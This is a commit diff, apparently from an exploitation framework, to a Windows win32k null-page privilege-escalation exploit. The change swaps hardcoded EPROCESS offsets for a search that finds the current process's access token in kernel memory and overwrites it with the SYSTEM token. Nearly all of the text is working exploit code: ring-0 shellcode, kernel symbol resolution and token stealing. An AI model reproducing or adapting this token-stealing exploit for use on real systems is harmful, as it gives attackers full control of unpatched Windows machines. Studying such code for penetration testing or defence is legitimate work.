Search the AccessToken
jvazquez-r7
parent
71a6ec8b12
commit
03a84a1de3
Binary file not shown.
Binary file not shown.
|
|
@ -38,6 +38,10 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
|
|||
OUT PVOID Process
|
||||
);
|
||||
|
||||
typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
|
||||
_Inout_ PVOID Process
|
||||
);
|
||||
|
||||
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
|
||||
_In_ DWORD SystemInformationClass,
|
||||
_Inout_ PVOID SystemInformation,
|
||||
|
|
@ -70,9 +74,9 @@ BOOL bHookCallbackFlag = FALSE;
|
|||
|
||||
WNDPROC lpPrevWndFunc;
|
||||
DWORD dwMyProcessId = 0;
|
||||
DWORD dwOffsetWindows = 0;
|
||||
|
||||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||
lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
|
||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||
|
||||
#ifdef DEBUGGING
|
||||
|
|
@ -131,16 +135,53 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
|
|||
#endif
|
||||
}
|
||||
|
||||
|
||||
// Search the specified data structure for a member with CurrentValue.
|
||||
BOOL FindAndReplaceMember(PDWORD Structure,
|
||||
DWORD CurrentValue,
|
||||
DWORD NewValue,
|
||||
DWORD MaxSize)
|
||||
{
|
||||
DWORD i, Mask;
|
||||
|
||||
// Microsoft QWORD aligns object pointers, then uses the lower three
|
||||
// bits for quick reference counting.
|
||||
Mask = ~7;
|
||||
|
||||
// Mask out the reference count.
|
||||
CurrentValue &= Mask;
|
||||
|
||||
// Scan the structure for any occurrence of CurrentValue.
|
||||
for (i = 0; i < MaxSize; i++) {
|
||||
if ((Structure[i] & Mask) == CurrentValue) {
|
||||
// And finally, replace it with NewValue.
|
||||
Structure[i] = NewValue;
|
||||
return TRUE;
|
||||
}
|
||||
}
|
||||
|
||||
// Member not found.
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
int _stdcall shellcode_ring0(int one, int two, int three, int four)
|
||||
{
|
||||
void *my_process_info = NULL;
|
||||
void *system_info = NULL;
|
||||
void *pMyProcessInfo = NULL;
|
||||
void *pSystemInfo = NULL;
|
||||
PACCESS_TOKEN SystemToken;
|
||||
PACCESS_TOKEN TargetToken;
|
||||
|
||||
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
|
||||
pPsLookupProcessByProcessId((HANDLE)4, &system_info);
|
||||
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
|
||||
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
|
||||
|
||||
*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
|
||||
TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
|
||||
SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);
|
||||
|
||||
// Find the token in the target process, and replace with the system token.
|
||||
FindAndReplaceMember((PDWORD)pMyProcessInfo,
|
||||
(DWORD)TargetToken,
|
||||
(DWORD)SystemToken,
|
||||
0x200);
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
|
@ -169,61 +210,6 @@ void win32k_null_page(LPVOID lpPayload)
|
|||
return;
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
|
||||
{
|
||||
// Ex: Windows 7 SP1
|
||||
dprintf("[*] Windows 6.1 found...");
|
||||
dwOffsetWindows = 0x208;
|
||||
}
|
||||
#else
|
||||
if (versionInfo.dwMajorVersion == 6)
|
||||
{
|
||||
if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
|
||||
{
|
||||
// Ex: Windows 7 SP1
|
||||
dprintf("[*] Windows 6.1 found...");
|
||||
dwOffsetWindows = 0xf8;
|
||||
}
|
||||
else if (!versionInfo.dwMinorVersion)
|
||||
{
|
||||
// Ex: Windows 2008 R2
|
||||
dprintf("[*] Windows 6.0 found...");
|
||||
dwOffsetWindows = 0xe0;
|
||||
}
|
||||
else
|
||||
{
|
||||
dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
|
||||
return;
|
||||
}
|
||||
}
|
||||
else if (versionInfo.dwMajorVersion == 5)
|
||||
{
|
||||
if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
|
||||
{
|
||||
// Ex: Windows XP SP3
|
||||
dprintf("[*] Windows 5.1 found...");
|
||||
dwOffsetWindows = 0xc8;
|
||||
}
|
||||
else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
|
||||
{
|
||||
// Ex: Windows 2003 SP2
|
||||
dprintf("[*] Windows 5.2 found...");
|
||||
dwOffsetWindows = 0xd8;
|
||||
}
|
||||
else
|
||||
{
|
||||
dprintf("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
|
||||
return;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
else
|
||||
{
|
||||
dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
|
||||
return;
|
||||
}
|
||||
|
||||
// Solve symbols
|
||||
dprintf("[*] Solving symbols...");
|
||||
|
||||
|
|
@ -321,6 +307,18 @@ void win32k_null_page(LPVOID lpPayload)
|
|||
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
|
||||
dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
|
||||
|
||||
|
||||
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(hNtKrnl, "PsReferencePrimaryToken");
|
||||
|
||||
if (pPsReferencePrimaryToken == NULL)
|
||||
{
|
||||
dprintf("[!] Failed to solve PsLookupProcessByProcessId");
|
||||
return;
|
||||
}
|
||||
|
||||
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)hNtKrnl));
|
||||
dprintf("[*] pPsReferencePrimaryToken in kernel: 0x%p", pPsReferencePrimaryToken);
|
||||
|
||||
dwMyProcessId = GetCurrentProcessId();
|
||||
|
||||
// Register Class
|
||||
|
|
|
|||
Loading…
Reference in New Issue